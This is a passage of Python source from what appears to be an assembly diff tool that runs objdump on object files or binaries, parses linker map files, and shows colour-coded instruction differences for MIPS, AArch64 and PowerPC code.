"""Format a multi-column table with an optional `header`"""
...
def apply(self, text: Text) -> str:
return "".join(self.apply_format(chunk, f) for chunk, f in text.segments)
@dataclass
class PlainFormatter(Formatter):
column_width: int
def apply_format(self, chunk: str, f: Format) -> str:
return chunk
def table(
self, header: Optional[Tuple[str, ...]], lines: List[Tuple[str, ...]]
) -> str:
if header:
lines = [header] + lines
return "\n".join(
"".join(x.ljust(self.column_width) for x in line) for line in lines
)
@dataclass
class AnsiFormatter(Formatter):
BASIC_ANSI_CODES = {
BasicFormat.NONE: "",
BasicFormat.IMMEDIATE: Fore.LIGHTBLUE_EX,
BasicFormat.STACK: Fore.YELLOW,
BasicFormat.REGISTER: Fore.YELLOW,
BasicFormat.DELAY_SLOT: Fore.LIGHTBLACK_EX,
BasicFormat.DIFF_CHANGE: Fore.LIGHTBLUE_EX,
BasicFormat.DIFF_ADD: Fore.GREEN,
BasicFormat.DIFF_REMOVE: Fore.RED,
BasicFormat.SOURCE_FILENAME: Style.BRIGHT,
# Underline (not in colorama) + bright
BasicFormat.SOURCE_FUNCTION: Style.BRIGHT + "\u001b[4m",
BasicFormat.SOURCE_OTHER: Style.DIM,
}
ROTATION_ANSI_COLORS = [
Fore.MAGENTA,
Fore.CYAN,
Fore.GREEN,
Fore.RED,
Fore.LIGHTYELLOW_EX,
Fore.LIGHTMAGENTA_EX,
Fore.LIGHTCYAN_EX,
Fore.LIGHTGREEN_EX,
Fore.LIGHTBLACK_EX,
]
column_width: int
def apply_format(self, chunk: str, f: Format) -> str:
if f == BasicFormat.NONE:
return chunk
if isinstance(f, BasicFormat):
ansi_code = self.BASIC_ANSI_CODES[f]
elif isinstance(f, RotationFormat):
ansi_code = self.ROTATION_ANSI_COLORS[
f.index % len(self.ROTATION_ANSI_COLORS)
]
else:
static_assert_unreachable(f)
return f"{ansi_code}{chunk}{Style.RESET_ALL}"
def table(
self, header: Optional[Tuple[str, ...]], lines: List[Tuple[str, ...]]
) -> str:
if header:
lines = [header] + lines
return "\n".join("".join(self.ansi_ljust(x) for x in line) for line in lines)
def ansi_ljust(self, s: str) -> str:
"""Like s.ljust(width), but accounting for ANSI colors."""
needed: int = self.column_width - ansiwrap.ansilen(s)
if needed > 0:
return s + " " * needed
else:
return s
@dataclass
class HtmlFormatter(Formatter):
rotation_formats: int = 9
def apply_format(self, chunk: str, f: Format) -> str:
chunk = html.escape(chunk)
if f == BasicFormat.NONE:
return chunk
if isinstance(f, BasicFormat):
class_name = f.name.lower().replace("_", "-")
data_attr = ""
elif isinstance(f, RotationFormat):
class_name = f"rotation-{f.index % self.rotation_formats}"
rotation_key = html.escape(f"{f.group};{f.key}", quote=True)
data_attr = f'data-rotation="{rotation_key}"'
else:
static_assert_unreachable(f)
return f"<span class='{class_name}' {data_attr}>{chunk}</span>"
def table(
self, header: Optional[Tuple[str, ...]], lines: List[Tuple[str, ...]]
) -> str:
def table_row(line: Tuple[str, ...], cell_el: str) -> str:
output_row = " <tr>"
for cell in line:
output_row += f"<{cell_el}>{cell}</{cell_el}>"
output_row += "</tr>\n"
return output_row
output = "<table class='diff'>\n"
if header:
output += " <thead>\n"
output += table_row(header, "th")
output += " </thead>\n"
output += " <tbody>\n"
output += "".join(table_row(line, "td") for line in lines)
output += " </tbody>\n"
output += "</table>\n"
return output
def format_fields(
pat: Pattern[str],
out1: Text,
out2: Text,
color1: FormatFunction,
color2: Optional[FormatFunction] = None,
) -> Tuple[Text, Text]:
diffs = [
of.group() != nf.group()
for (of, nf) in zip(out1.finditer(pat), out2.finditer(pat))
]
it = iter(diffs)
def maybe_color(color: FormatFunction, s: str) -> Text:
return Text(s, color(s)) if next(it, False) else Text(s)
out1 = out1.sub(pat, lambda m: maybe_color(color1, m.group()))
it = iter(diffs)
out2 = out2.sub(pat, lambda m: maybe_color(color2 or color1, m.group()))
return out1, out2
def symbol_formatter(group: str, base_index: int) -> FormatFunction:
symbol_formats: Dict[str, Format] = {}
def symbol_format(s: str) -> Format:
# TODO: it would be nice to use a unique Format for each symbol, so we could
# add extra UI elements in the HTML version
f = symbol_formats.get(s)
if f is None:
index = len(symbol_formats) + base_index
f = RotationFormat(key=s, index=index, group=group)
symbol_formats[s] = f
return f
return symbol_format
# ==== LOGIC ====
ObjdumpCommand = Tuple[List[str], str, Optional[str]]
def maybe_eval_int(expr: str) -> Optional[int]:
try:
ret = ast.literal_eval(expr)
if not isinstance(ret, int):
raise Exception("not an integer")
return ret
except Exception:
return None
def eval_int(expr: str, emsg: str) -> int:
ret = maybe_eval_int(expr)
if ret is None:
fail(emsg)
return ret
def eval_line_num(expr: str) -> int:
return int(expr.strip().replace(":", ""), 16)
def run_make(target: str, project: ProjectSettings) -> None:
subprocess.check_call(project.build_command + [target])
def run_make_capture_output(
target: str, project: ProjectSettings
) -> "subprocess.CompletedProcess[bytes]":
return subprocess.run(
project.build_command + [target],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
)
def restrict_to_function(dump: str, fn_name: str, config: Config) -> str:
out: List[str] = []
search = f"<{fn_name}>:"
found = False
for line in dump.split("\n"):
if found:
if len(out) >= config.max_function_size_lines:
break
out.append(line)
elif search in line:
found = True
return "\n".join(out)
def maybe_get_objdump_source_flags(config: Config) -> List[str]:
if not config.source:
return []
flags = [
"--source",
"-l",
]
if not config.source_old_binutils:
flags.append("--source-comment=│ ")
if config.inlines:
flags.append("--inlines")
return flags
def run_objdump(cmd: ObjdumpCommand, config: Config, project: ProjectSettings) -> str:
flags, target, restrict = cmd
try:
out = subprocess.run(
[project.objdump_executable] + config.arch.arch_flags + flags + [target],
check=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
).stdout
except subprocess.CalledProcessError as e:
print(e.stdout)
print(e.stderr)
if "unrecognized option '--source-comment" in e.stderr:
fail("** Try using --source-old-binutils instead of --source **")
raise e
if restrict is not None:
return restrict_to_function(out, restrict, config)
return out
def search_map_file(
fn_name: str, project: ProjectSettings
) -> Tuple[Optional[str], Optional[int]]:
if not project.mapfile:
fail(f"No map file configured; cannot find function {fn_name}.")
try:
with open(project.mapfile) as f:
contents = f.read()
except Exception:
fail(f"Failed to open map file {project.mapfile} for reading.")
if project.map_format == "gnu":
lines = contents.split("\n")
try:
cur_objfile = None
ram_to_rom = None
cands = []
last_line = ""
for line in lines:
if line.startswith(" .text"):
cur_objfile = line.split()[3]
if "load address" in line:
tokens = last_line.split() + line.split()
ram = int(tokens[1], 0)
rom = int(tokens[5], 0)
ram_to_rom = rom - ram
if line.endswith(" " + fn_name):
ram = int(line.split()[0], 0)
if cur_objfile is not None and ram_to_rom is not None:
cands.append((cur_objfile, ram + ram_to_rom))
last_line = line
except Exception as e:
import traceback
traceback.print_exc()
fail(f"Internal error while parsing map file")
if len(cands) > 1:
fail(f"Found multiple occurrences of function {fn_name} in map file.")
if len(cands) == 1:
return cands[0]
elif project.map_format == "mw":
find = re.findall(
re.compile(
# ram elf rom
r" \S+ \S+ (\S+) (\S+) . "
+ fn_name
# object name
+ r"(?: \(entry of \.(?:init|text)\))? \t(\S+)"
),
contents,
)
if len(find) > 1:
fail(f"Found multiple occurrences of function {fn_name} in map file.")
if len(find) == 1:
rom = int(find[0][1], 16)
objname = find[0][2]
# The metrowerks linker map format does not contain the full object path,
# so we must complete it manually.
objfiles = [
os.path.join(dirpath, f)
for dirpath, _, filenames in os.walk(project.mw_build_dir)
for f in filenames
if f == objname
]
if len(objfiles) > 1:
all_objects = "\n".join(objfiles)
fail(
f"Found multiple objects of the same name {objname} in {project.mw_build_dir}, "
f"cannot determine which to diff against: \n{all_objects}"
)
if len(objfiles) == 1:
objfile = objfiles[0]
# TODO Currently the ram-rom conversion only works for diffing ELF
# executables, but it would likely be more convenient to diff DOLs.
# At this time it is recommended to always use -o when running the diff
# script as this mode does not make use of the ram-rom conversion.
return objfile, rom
else:
fail(f"Linker map format {project.map_format} unrecognised.")
return None, None
def dump_elf(
start: str,
end: Optional[str],
diff_elf_symbol: str,
config: Config,
project: ProjectSettings,
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if not project.baseimg or not project.myimg:
fail("Missing myimg/baseimg in config.")
if config.base_shift:
fail("--base-shift not compatible with -e")
start_addr = eval_int(start, "Start address must be an integer expression.")
if end is not None:
end_addr = eval_int(end, "End address must be an integer expression.")
else:
end_addr = start_addr + config.max_function_size_bytes
flags1 = [
f"--start-address={start_addr}",
f"--stop-address={end_addr}",
]
flags2 = [
f"--disassemble={diff_elf_symbol}",
]
objdump_flags = ["-drz", "-j", ".text"]
return (
project.myimg,
(objdump_flags + flags1, project.baseimg, None),
(
objdump_flags + flags2 + maybe_get_objdump_source_flags(config),
project.myimg,
None,
),
)
def dump_objfile(
start: str, end: Optional[str], config: Config, project: ProjectSettings
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if config.base_shift:
fail("--base-shift not compatible with -o")
if end is not None:
fail("end address not supported together with -o")
if start.startswith("0"):
fail("numerical start address not supported with -o; pass a function name")
objfile, _ = search_map_file(start, project)
if not objfile:
fail("Not able to find .o file for function.")
if config.make:
run_make(objfile, project)
if not os.path.isfile(objfile):
fail(f"Not able to find .o file for function: {objfile} is not a file.")
refobjfile = "expected/" + objfile
if not os.path.isfile(refobjfile):
fail(f'Please ensure an OK .o file exists at "{refobjfile}".')
objdump_flags = ["-drz"]
return (
objfile,
(objdump_flags, refobjfile, start),
(objdump_flags + maybe_get_objdump_source_flags(config), objfile, start),
)
def dump_binary(
start: str, end: Optional[str], config: Config, project: ProjectSettings
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if not project.baseimg or not project.myimg:
fail("Missing myimg/baseimg in config.")
if config.make:
run_make(project.myimg, project)
start_addr = maybe_eval_int(start)
if start_addr is None:
_, start_addr = search_map_file(start, project)
if start_addr is None:
fail("Not able to find function in map file.")
if end is not None:
end_addr = eval_int(end, "End address must be an integer expression.")
else:
end_addr = start_addr + config.max_function_size_bytes
objdump_flags = ["-Dz", "-bbinary", "-EB"]
flags1 = [
f"--start-address={start_addr + config.base_shift}",
f"--stop-address={end_addr + config.base_shift}",
]
flags2 = [f"--start-address={start_addr}", f"--stop-address={end_addr}"]
return (
project.myimg,
(objdump_flags + flags1, project.baseimg, None),
(objdump_flags + flags2, project.myimg, None),
)
class DifferenceNormalizer:
def __init__(self, config: Config) -> None:
self.config = config
def normalize(self, mnemonic: str, row: str) -> str:
"""This should be called exactly once for each line."""
row = self._normalize_arch_specific(mnemonic, row)
if self.config.ignore_large_imms:
row = re.sub(self.config.arch.re_large_imm, "<imm>", row)
return row
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
return row
class DifferenceNormalizerAArch64(DifferenceNormalizer):
def __init__(self, config: Config) -> None:
super().__init__(config)
self._adrp_pair_registers: Set[str] = set()
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
if self.config.ignore_addr_diffs:
row = self._normalize_adrp_differences(mnemonic, row)
row = self._normalize_bl(mnemonic, row)
return row
def _normalize_bl(self, mnemonic: str, row: str) -> str:
if mnemonic != "bl":
return row
row, _ = split_off_branch(row)
return row
def _normalize_adrp_differences(self, mnemonic: str, row: str) -> str:
"""Identifies ADRP + LDR/ADD pairs that are used to access the GOT and
suppresses any immediate differences.
Whenever an ADRP is seen, the destination register is added to the set of registers
that are part of an ADRP + LDR/ADD pair. Registers are removed from the set as soon
as they are used for an LDR or ADD instruction which completes the pair.
This method is somewhat crude but should manage to detect most such pairs.
"""
row_parts = row.split("\t", 1)
if mnemonic == "adrp":
self._adrp_pair_registers.add(row_parts[1].strip().split(",")[0])
row, _ = split_off_branch(row)
elif mnemonic == "ldr":
for reg in self._adrp_pair_registers:
# ldr xxx, [reg]
# ldr xxx, [reg, <imm>]
if f", [{reg}" in row_parts[1]:
self._adrp_pair_registers.remove(reg)
return normalize_imms(row, AARCH64_SETTINGS)
elif mnemonic == "add":
for reg in self._adrp_pair_registers:
# add reg, reg, <imm>
if row_parts[1].startswith(f"{reg}, {reg}, "):
self._adrp_pair_registers.remove(reg)
return normalize_imms(row, AARCH64_SETTINGS)
return row
@dataclass
class ArchSettings:
re_int: Pattern[str]
re_comment: Pattern[str]
re_reg: Pattern[str]
re_sprel: Pattern[str]
re_large_imm: Pattern[str]
re_imm: Pattern[str]
branch_instructions: Set[str]
instructions_with_address_immediates: Set[str]
forbidden: Set[str] = field(default_factory=lambda: set(string.ascii_letters + "_"))
arch_flags: List[str] = field(default_factory=list)
branch_likely_instructions: Set[str] = field(default_factory=set)
difference_normalizer: Type[DifferenceNormalizer] = DifferenceNormalizer
MIPS_BRANCH_LIKELY_INSTRUCTIONS = {
"beql",
"bnel",
"beqzl",
"bnezl",
"bgezl",
"bgtzl",
"blezl",
"bltzl",
"bc1tl",
"bc1fl",
}
MIPS_BRANCH_INSTRUCTIONS = MIPS_BRANCH_LIKELY_INSTRUCTIONS.union(
{
"b",
"beq",
"bne",
"beqz",
"bnez",
"bgez",
"bgtz",
"blez",
"bltz",
"bc1t",
"bc1f",
}
)
AARCH64_BRANCH_INSTRUCTIONS = {
"bl",
"b",
"b.eq",
"b.ne",
"b.cs",
"b.hs",
"b.cc",
"b.lo",
"b.mi",
"b.pl",
"b.vs",
"b.vc",
"b.hi",
"b.ls",
"b.ge",
"b.lt",
"b.gt",
"b.le",
"cbz",
"cbnz",
"tbz",
"tbnz",
}
PPC_BRANCH_INSTRUCTIONS = {
"b",
"beq",
"beq+",
"beq-",
"bne",
"bne+",
"bne-",
"blt",
"blt+",
"blt-",
"ble",
"ble+",
"ble-",
"bdnz",
"bdnz+",
"bdnz-",
"bge",
"bge+",
"bge-",
"bgt",
"bgt+",
"bgt-",
}
MIPS_SETTINGS = ArchSettings(
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"<.*?>"),
re_reg=re.compile(
r"\$?\b(a[0-3]|t[0-9]|s[0-8]|at|v[01]|f[12]?[0-9]|f3[01]|k[01]|fp|ra|zero)\b"
),
re_sprel=re.compile(r"(?<=,)([0-9]+|0x[0-9a-f]+)\(sp\)"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(\b|-)([0-9]+|0x[0-9a-fA-F]+)\b(?!\(sp)|%(lo|hi)\([^)]*\)"),
arch_flags=["-m", "mips:4300"],
branch_likely_instructions=MIPS_BRANCH_LIKELY_INSTRUCTIONS,
branch_instructions=MIPS_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=MIPS_BRANCH_INSTRUCTIONS.union({"jal", "j"}),
)
AARCH64_SETTINGS = ArchSettings(
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*?>|//.*$)"),
# GPRs and FP registers: X0-X30, W0-W30, [DSHQ]0..31
# The zero registers and SP should not be in this list.
re_reg=re.compile(r"\$?\b([dshq][12]?[0-9]|[dshq]3[01]|[xw][12]?[0-9]|[xw]30)\b"),
re_sprel=re.compile(r"sp, #-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(?<!sp, )#-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
branch_instructions=AARCH64_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=AARCH64_BRANCH_INSTRUCTIONS.union({"adrp"}),
difference_normalizer=DifferenceNormalizerAArch64,
)
PPC_SETTINGS = ArchSettings(
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*?>|//.*$)"),
re_reg=re.compile(r"\$?\b([rf][0-9]+)\b"),
re_sprel=re.compile(r"(?<=,)(-?[0-9]+|-?0x[0-9a-f]+)\(r1\)"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(\b|-)([0-9]+|0x[0-9a-fA-F]+)\b(?!\(r1)|[^@]*@(ha|h|lo)"),
branch_instructions=PPC_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=PPC_BRANCH_INSTRUCTIONS.union({"bl"}),
)
def hexify_int(row: str, pat: Match[str], arch: ArchSettings) -> str:
full = pat.group(0)
if len(full) <= 1:
# leave one-digit ints alone
return full
start, end = pat.span()
if start and row[start - 1] in arch.forbidden:
return full
if end < len(row) and row[end] in arch.forbidden:
return full
return hex(int(full))
def parse_relocated_line(line: str) -> Tuple[str, str, str]:
for c in ",\t ":
if c in line:
ind2 = line.rindex(c)
break
else:
raise Exception(f"failed to parse relocated line: {line}")
before = line[: ind2 + 1]
after = line[ind2 + 1 :]
ind2 = after.find("(")
if ind2 == -1:
imm, after = after, ""
else:
imm, after = after[:ind2], after[ind2:]
if imm == "0x0":
imm = "0"
return before, imm, after
def process_mips_reloc(row: str, prev: str, arch: ArchSettings) -> str:
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
if imm != "0":
# MIPS uses relocations with addends embedded in the code as immediates.
# If there is an immediate, show it as part of the relocation. Ideally
# we'd show this addend in both %lo/%hi, but annoyingly objdump's output
# doesn't include enough information to pair up %lo's and %hi's...
# TODO: handle unambiguous cases where all addends for a symbol are the
# same, or show "+???".
mnemonic = prev.split()[0]
if (
mnemonic in arch.instructions_with_address_immediates
and not imm.startswith("0x")
):
imm = "0x" + imm
repl += "+" + imm if int(imm, 0) > 0 else imm
if "R_MIPS_LO16" in row:
repl = f"%lo({repl})"
elif "R_MIPS_HI16" in row:
# Ideally we'd pair up R_MIPS_LO16 and R_MIPS_HI16 to generate a
# correct addend for each, but objdump doesn't give us the order of
# the relocations, so we can't find the right LO16. :(
repl = f"%hi({repl})"
elif "R_MIPS_26" in row:
# Function calls
pass
elif "R_MIPS_PC16" in row:
# Branch to glabel. This gives confusing output, but there's not much
# we can do here.
pass
else:
assert False, f"unknown relocation type '{row}' for line '{prev}'"
return before + repl + after
def process_ppc_reloc(row: str, prev: str) -> str:
assert any(
r in row for r in ["R_PPC_REL24", "R_PPC_ADDR16", "R_PPC_EMB_SDA21"]
), f"unknown relocation type '{row}' for line '{prev}'"
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
if "R_PPC_REL24" in row:
# function calls
pass
elif "R_PPC_ADDR16_HI" in row:
# absolute hi of addr
repl = f"{repl}@h"
elif "R_PPC_ADDR16_HA" in row:
# adjusted hi of addr
repl = f"{repl}@ha"
elif "R_PPC_ADDR16_LO" in row:
# lo of addr
repl = f"{repl}@l"
elif "R_PPC_ADDR16" in row:
# 16-bit absolute addr
if "+0x7" in repl:
# remove the very large addends as they are an artifact of (label-_SDA(2)_BASE_)
# computations and are unimportant in a diff setting.
if int(repl.split("+")[1], 16) > 0x70000000:
repl = repl.split("+")[0]
elif "R_PPC_EMB_SDA21" in row:
# small data area
pass
return before + repl + after
def pad_mnemonic(line: str) -> str:
if "\t" not in line:
return line
mn, args = line.split("\t", 1)
return f"{mn:<7s} {args}"
@dataclass
class Line:
mnemonic: str
diff_row: str
original: str
normalized_original: str
line_num: str
branch_target: Optional[str]
source_lines: List[str]
comment: Optional[str]
def process(lines: List[str], config: Config) -> List[Line]:
arch = config.arch
normalizer = arch.difference_normalizer(config)
skip_next = False
source_lines = []
if not config.diff_obj:
lines = lines[7:]
if lines and not lines[-1]:
lines.pop()
output: List[Line] = []
stop_after_delay_slot = False
for row in lines:
if config.diff_obj and (">:" in row or not row):
continue
if config.source and not config.source_old_binutils and (row and row[0] != " "):
source_lines.append(row)
continue
if "R_AARCH64_" in row:
# TODO: handle relocation
continue
if "R_MIPS_" in row:
# N.B. Don't transform the diff rows, they already ignore immediates
# if output[-1].diff_row != "<delay-slot>":
# output[-1] = output[-1].replace(diff_row=process_mips_reloc(row, output[-1].row_with_imm, arch))
new_original = process_mips_reloc(row, output[-1].original, arch)
output[-1] = replace(output[-1], original=new_original)
continue
if "R_PPC_" in row:
new_original = process_ppc_reloc(row, output[-1].original)
output[-1] = replace(output[-1], original=new_original)
continue
# match source lines here to avoid matching relocation lines
if (
config.source
and config.source_old_binutils
and (row and not re.match(r"^ +[0-9a-f]+:\t", row))
):
source_lines.append(row)
continue
m_comment = re.search(arch.re_comment, row)
comment = m_comment[0] if m_comment else None
row = re.sub(arch.re_comment, "", row)
row = row.rstrip()
tabs = row.split("\t")
row = "\t".join(tabs[2:])
line_num = tabs[0].strip()
if "\t" in row:
row_parts = row.split("\t", 1)
else:
# powerpc-eabi-objdump doesn't use tabs
row_parts = [part.lstrip() for part in row.split(" ", 1)]
mnemonic = row_parts[0].strip()
if mnemonic not in arch.instructions_with_address_immediates:
row = re.sub(arch.re_int, lambda m: hexify_int(row, m, arch), row)
original = row
normalized_original = normalizer.normalize(mnemonic, original)
if skip_next:
skip_next = False
row = "<delay-slot>"
mnemonic = "<delay-slot>"
if mnemonic in arch.branch_likely_instructions:
skip_next = True
row = re.sub(arch.re_reg, "<reg>", row)
row = re.sub(arch.re_sprel, "addr(sp)", row)
row_with_imm = row
if mnemonic in arch.instructions_with_address_immediates:
row = row.strip()
row, _ = split_off_branch(row)
row += "<imm>"
else:
row = normalize_imms(row, arch)
branch_target = None
if mnemonic in arch.branch_instructions:
target = int(row_parts[1].strip().split(",")[-1], 16)
if mnemonic in arch.branch_likely_instructions:
target -= 4
branch_target = hex(target)[2:]
output.append(
Line(
mnemonic=mnemonic,
diff_row=row,
original=original,
normalized_original=normalized_original,
line_num=line_num,
branch_target=branch_target,
source_lines=source_lines,
comment=comment,
)
)
source_lines = []
if config.stop_jrra and mnemonic == "jr" and row_parts[1].strip() == "ra":
stop_after_delay_slot = True
elif stop_after_delay_slot:
break
return output
def normalize_imms(row: str, arch: ArchSettings) -> str:
return re.sub(arch.re_imm, "<imm>", row)
def normalize_stack(row: str, arch: ArchSettings) -> str:
return re.sub(arch.re_sprel, "addr(sp)", row)
def split_off_branch(line: str) -> Tuple[str, str]:
parts = line.split(",")
if len(parts) < 2:
parts = line.split(None, 1)
off = len(line) - len(parts[-1])
return line[:off], line[off:]
def diff_sequences_difflib(
seq1: List[str], seq2: List[str]
) -> List[Tuple[str, int, int, int, int]]:
differ = difflib.SequenceMatcher(a=seq1, b=seq2, autojunk=False)
return differ.get_opcodes()
def diff_sequences(
seq1: List[str], seq2: List[str], algorithm: str
) -> List[Tuple[str, int, int, int, int]]:
if (
algorithm != "levenshtein"
or len(seq1) * len(seq2) > 4 * 10 ** 8
or len(seq1) + len(seq2) >= 0x110000
):
return diff_sequences_difflib(seq1, seq2)
# The Levenshtein library assumes that we compare strings, not lists. Convert.
# (Per the check above we know we have fewer than 0x110000 unique elements, so chr() works.)
remapping: Dict[str, str] = {}
def remap(seq: List[str]) -> str:
seq = seq[:]
for i in range(len(seq)):
val = remapping.get(seq[i])
if val is None:
val = chr(len(remapping))
remapping[seq[i]] = val
seq[i] = val
return "".join(seq)
rem1 = remap(seq1)
rem2 = remap(seq2)
import Levenshtein # type: ignore
return Levenshtein.opcodes(rem1, rem2) # type: ignore
def diff_lines(
lines1: List[Line],
lines2: List[Line],
algorithm: str,
) -> List[Tuple[Optional[Line], Optional[Line]]]:
ret = []
for (tag, i1, i2, j1, j2) in diff_sequences(
[line.mnemonic for line in lines1],
[line.mnemonic for line in lines2],
algorithm,
):
for line1, line2 in itertools.zip_longest(lines1[i1:i2], lines2[j1:j2]):
if tag == "replace":
if line1 is None:
tag = "insert"
elif line2 is None:
tag = "delete"
elif tag == "insert":
assert line1 is None
elif tag == "delete":
assert line2 is None
ret.append((line1, line2))
return ret
@dataclass(frozen=True)
class OutputLine:
base: Optional[Text] = field(compare=False)
fmt2: Text = field(compare=False)
key2: Optional[str]
def do_diff(basedump: str, mydump: str, config: Config) -> List[OutputLine]:
if config.source:
import cxxfilt # type: ignore
arch = config.arch
fmt = config.formatter
output: List[OutputLine] = []
lines1 = process(basedump.split("\n"), config)
lines2 = process(mydump.split("\n"), config)
sc1 = symbol_formatter("base-reg", 0)
sc2 = symbol_formatter("my-reg", 0)
sc3 = symbol_formatter("base-stack", 4)
sc4 = symbol_formatter("my-stack", 4)
sc5 = symbol_formatter("base-branch", 0)
sc6 = symbol_formatter("my-branch", 0)
bts1: Set[str] = set()
bts2: Set[str] = set()
if config.show_branches:
for (lines, btset, sc) in [
(lines1, bts1, sc5),
(lines2, bts2, sc6),
]:
for line in lines:
bt = line.branch_target
if bt is not None:
text = f"{bt}:"
btset.add(text)
sc(text)
for (line1, line2) in diff_lines(lines1, lines2, config.algorithm):
line_color1 = line_color2 = sym_color = BasicFormat.NONE
line_prefix = " "
out1 = Text() if not line1 else Text(pad_mnemonic(line1.original))
out2 = Text() if not line2 else Text(pad_mnemonic(line2.original))
if line1 and line2 and line1.diff_row == line2.diff_row:
if line1.normalized_original == line2.normalized_original:
pass
elif line1.diff_row == "<delay-slot>":
out1 = out1.reformat(BasicFormat.DELAY_SLOT)
out2 = out2.reformat(BasicFormat.DELAY_SLOT)
else:
mnemonic = line1.original.split()[0]
branch1 = branch2 = Text()
if mnemonic in arch.instructions_with_address_immediates:
out1, branch1 = map(Text, split_off_branch(out1.plain()))
out2, branch2 = map(Text, split_off_branch(out2.plain()))
branchless1 = out1.plain()
branchless2 = out2.plain()
out1, out2 = format_fields(
arch.re_imm, out1, out2, lambda _: BasicFormat.IMMEDIATE
)
same_relative_target = False
if line1.branch_target is not None and line2.branch_target is not None:
relative_target1 = eval_line_num(
line1.branch_target
) - eval_line_num(line1.line_num)
relative_target2 = eval_line_num(
line2.branch_target
) - eval_line_num(line2.line_num)
same_relative_target = relative_target1 == relative_target2
if not same_relative_target and branch1.plain() != branch2.plain():
branch1 = branch1.reformat(BasicFormat.IMMEDIATE)
branch2 = branch2.reformat(BasicFormat.IMMEDIATE)
out1 += branch1
out2 += branch2
if normalize_imms(branchless1, arch) == normalize_imms(
branchless2, arch
):
if not same_relative_target:
# only imms differences
sym_color = BasicFormat.IMMEDIATE
line_prefix = "i"
else:
out1, out2 = format_fields(arch.re_sprel, out1, out2, sc3, sc4)
if normalize_stack(branchless1, arch) == normalize_stack(
branchless2, arch
):
# only stack differences (luckily stack and imm
# differences can't be combined in MIPS, so we
# don't have to think about that case)
sym_color = BasicFormat.STACK
line_prefix = "s"
else:
# regs differences and maybe imms as well
out1, out2 = format_fields(arch.re_reg, out1, out2, sc1, sc2)
line_color1 = line_color2 = sym_color = BasicFormat.REGISTER
line_prefix = "r"
elif line1 and line2:
line_prefix = "|"
line_color1 = line_color2 = sym_color = BasicFormat.DIFF_CHANGE
out1 = out1.reformat(line_color1)
out2 = out2.reformat(line_color2)
elif line1:
line_prefix = "<"
line_color1 = sym_color = BasicFormat.DIFF_REMOVE
out1 = out1.reformat(line_color1)
out2 = Text()
elif line2:
line_prefix = ">"
line_color2 = sym_color = BasicFormat.DIFF_ADD
out1 = Text()
out2 = out2.reformat(line_color2)
if config.source and line2 and line2.comment:
out2 += f" {line2.comment}"
def format_part(
out: Text,
line: Optional[Line],
line_color: Format,
btset: Set[str],
sc: FormatFunction,
) -> Optional[Text]:
if line is None:
return None
in_arrow = Text(" ")
out_arrow = Text()
if config.show_branches:
if line.line_num in btset:
in_arrow = Text("~>", sc(line.line_num))
if line.branch_target is not None:
out_arrow = " " + Text("~>", sc(line.branch_target + ":"))
return (
Text(line.line_num, line_color) + " " + in_arrow + " " + out + out_arrow
)
part1 = format_part(out1, line1, line_color1, bts1, sc5)
part2 = format_part(out2, line2, line_color2, bts2, sc6)
key2 = line2.original if line2 else None
if line2:
for source_line in line2.source_lines:
line_format = BasicFormat.SOURCE_OTHER
if config.source_old_binutils:
if source_line and re.fullmatch(".*\.c(?:pp)?:\d+", source_line):
line_format = BasicFormat.SOURCE_FILENAME
elif source_line and source_line.endswith("():"):
line_format = BasicFormat.SOURCE_FUNCTION
try:
source_line = cxxfilt.demangle(
source_line[:-3], external_only=False
)
except:
pass
else:
# File names and function names
if source_line and source_line[0] != "│":
line_format = BasicFormat.SOURCE_FILENAME
# Function names
if source_line.endswith("():"):
line_format = BasicFormat.SOURCE_FUNCTION
try:
source_line = cxxfilt.demangle(
source_line[:-3], external_only=False
)
except:
pass
output.append(
OutputLine(
None,
" " + Text(source_line, line_format),
source_line,
)
)
fmt2 = Text(line_prefix, sym_color) + " " + (part2 or Text())
output.append(OutputLine(part1, fmt2, key2))
return output
def chunk_diff(diff: List[OutputLine]) -> List[Union[List[OutputLine], OutputLine]]:
cur_right: List[OutputLine] = []
chunks: List[Union[List[OutputLine], OutputLine]] = []
for output_line in diff:
if output_line.base is not None:
chunks.append(cur_right)
chunks.append(output_line)
cur_right = []
else:
cur_right.append(output_line)
chunks.append(cur_right)
return chunks
def format_diff(
old_diff: List[OutputLine], new_diff: List[OutputLine], config: Config
) -> Tuple[Optional[Tuple[str, ...]], List[Tuple[str, ...]]]:
fmt = config.formatter
old_chunks = chunk_diff(old_diff)
new_chunks = chunk_diff(new_diff)
output: List[Tuple[Text, OutputLine, OutputLine]] = []
assert len(old_chunks) == len(new_chunks), "same target"
empty = OutputLine(Text(), Text(), None)
for old_chunk, new_chunk in zip(old_chunks, new_chunks):
if isinstance(old_chunk, list):
assert isinstance(new_chunk, list)
if not old_chunk and not new_chunk:
# Most of the time lines sync up without insertions/deletions,
# and there's no interdiffing to be done.
continue
differ = difflib.SequenceMatcher(a=old_chunk, b=new_chunk, autojunk=False)
for (tag, i1, i2, j1, j2) in differ.get_opcodes():
if tag in ["equal", "replace"]:
for i, j in zip(range(i1, i2), range(j1, j2)):
output.append((Text(), old_chunk[i], new_chunk[j]))
if tag in ["insert", "replace"]:
for j in range(j1 + i2 - i1, j2):
output.append((Text(), empty, new_chunk[j]))
if tag in ["delete", "replace"]:
for i in range(i1 + j2 - j1, i2):
